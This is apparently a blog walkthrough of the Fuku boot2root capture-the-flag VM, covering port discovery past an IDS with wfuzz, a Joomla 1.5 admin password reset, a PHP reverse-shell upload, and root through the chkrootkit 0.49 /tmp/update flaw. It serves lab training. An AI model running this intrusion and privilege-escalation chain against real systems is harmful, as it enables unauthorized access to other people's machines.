SecTalks: BNE0x02 – Fuku

fuku

Description

Fuku (pronounced “far queue”) CTF is designed to fuck with people.

This is a boot2root. Import it in VirtualBox, using a Host Only adapter, or use an adapter that will assign it an IP address in the 192.168.56.0/24 range. It only likes having an IP address in that range.

Treat the box as if it was on the network. Don’t try to do anything to it that you could only do with physical access, e.g. break into the BIOS or the Grub boot loader.

There are a few flag.txt files to grab. The final one is in the /root/ directory. However, the ultimate goal is to get a root shell.

Scenario
“Bull was pissed when you broke into his Minotaur box. He has taken precautions with another website that he is hosting, implementing IDS, whitelisting, and obfuscation techniques. He is now taunting hackers to try and hack him, believing himself to be safe. It is up to you to put him in his place.”

Hints
Some scripting will probably be needed to find a useful port.
If the machine seems to go down after a while, it probably hasn’t. This CTF isn’t called Fuku for nothing!

Enumeration

Let’s start with nmap.

nmap -A -T4 -p- -sV -Pn 192.168.56.2

After a long wait nothing. It was said in the description that this machine will mess with you, so let’s try a different approach.

nmap -v -O 192.168.56.0/24 -Pn -p 80

nmap.JPG

Guess there is at least a web server running on the machine and it’s on 192.168.56.2.
TCP Sequence Prediction says good luck! Lucky me. According to nmap the range of comments goes as followed: Trivial joke to Easy, Medium, Formidable, Worthy challenge, and finally Good luck! While doing the nmap scans I let netdiscover run and surprisingly enough there pops up another IP address coming from the Fuku machine. This time 192.168.56.174. Time for another nmap scan.

nmap -A -v -sV -p- 192.168.56.174

In the mean time I tried to connect my browser to either IP addresses port 80, but the result was a reset. Let’s use curl and wait for the result.

curl http://192.168.56.2

curl1

curl http://192.168.56.174

curl1

The nmap result of the 192.168.56.174 came out with all ports open. But none I could connect to. Well FUKU you too!

Looking at netdiscover I again find myself looking at another IP address of FUKU. The IDS is playing with me. Nmap isn’t going to work it seems, but I still need to find an open port which will actually let me make a connection. After some googling I stumbled onto a possible solution in the form of Wfuzz as a port scanner (https://github.com/xmendez/wfuzz/blob/master/README and https://github.com/xmendez/wfuzz/wiki/Filtering-results).

wfuzz -c -z range,1-65535 –hw 0 -Z http://192.168.56.225:FUZZ/

wfuzz

It took some time, but I finally have a entry point on which to go on.

Opening the browser and direct it to 192.168.56.249:13370 (the IP address has changed for the 8th time now).

On the website is some comment from the owner about being pissed off. Text on the page are the lyrics from Rick Astley his song – Never Gonna Give You Up. Looking at the bottom of the page I see that the site is powered by Joomla. Checking the source code it seems the version of Joomla is 1.5. Let’s get some more information.

nikto -h http://192.168.56.215:13370

A whole lot of information. Starting with the directory /flag/.

flag1

I checked out all the directories that were listed in the robots file. But found nothing that was useful. So it’s time to check on the vulnerabilities of Joomla. With joomscan it’s easy to find out what version is running and which vulnerabilities are present.
And we have a winner. Looks like I can change the admin password and log in as admin. Sounds good. Following the instructions I changed the password and saved it and logged in as admin.

password

admin

inside

Now I’m inside as an admin, it’s time to upload a nice php file and get a reverse shell.
After I tried to upload a reverse-shell.php from pentestmonkey I noticed there was a filter that foiled my plans. Time to make some changes in the configuration. After adding “php” and “application/php” to the whitelist I was finally able to upload the shell.php and activate it via /images/shell.php.

shell

bash

Not much to misuse inside this box because of the many restrictions.

$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=15.04
DISTRIB_CODENAME=vivid
DISTRIB_DESCRIPTION=”Ubuntu 15.04″
NAME=”Ubuntu”
VERSION=”15.04 (Vivid Vervet)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 15.04″
VERSION_ID=”15.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”

ps -U root

chkroot

$ cat /proc/1311/cmdline
/bin/bash/root/chkrootkit-0.49/run_chkrootkit$

Looks like root runs a process called chkrootkit-0.49. This package has a serious vulnerability, which may allow local attackers to gain root access.
It will execute the file /tmp/update as root.

echo “root:password123 | chpasswd” > /tmp/update

After a while……….

$ su root
su: must be run from a terminal
$ python2.7 -c ‘import pty; pty.spawn(“/bin/bash”);’
www-data@Fuku:/$ su root
su root
Password: password123
root@Fuku:/# cat /root/flag.txt
cat /root/flag.txt
Yep, this is a flag. It’s worth over 9000 Internet points!
Random keyboard smash: lkhI6u%RdFEtDjJKIuuiI7i&*iuGf)8$d4gfh%4

Finally. This was a fun challenge, but an annoying one due to changing of the IP address.

 

Advertenties